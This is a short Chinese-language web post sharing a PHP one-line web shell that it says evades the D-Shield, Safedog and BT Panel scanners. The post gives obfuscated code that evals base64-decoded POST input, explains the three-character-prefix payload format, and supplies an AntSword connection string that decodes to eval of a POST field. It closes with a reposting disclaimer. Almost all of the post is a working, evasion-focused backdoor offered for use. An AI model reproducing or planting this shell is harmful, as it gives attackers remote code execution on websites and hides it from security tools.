<?php if(isset($_REQUEST['phpsessid'])){ class A { static $d; } class B extends A { } A::$d =base64_decode(substr($_POST['key'],3)); eval(B::$d); } ?>
D盾查杀无提示
利用方法如图,实际就是「任意3个字符的前缀+base64编码的PHP代码」
中国蚁剑连接参数 key=aaaZXZhbCgkX1BPU1RbMV0pOw==&1
连接成功
分享一个过狗过D盾过宝塔的php一句话木马
免责声明!
本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。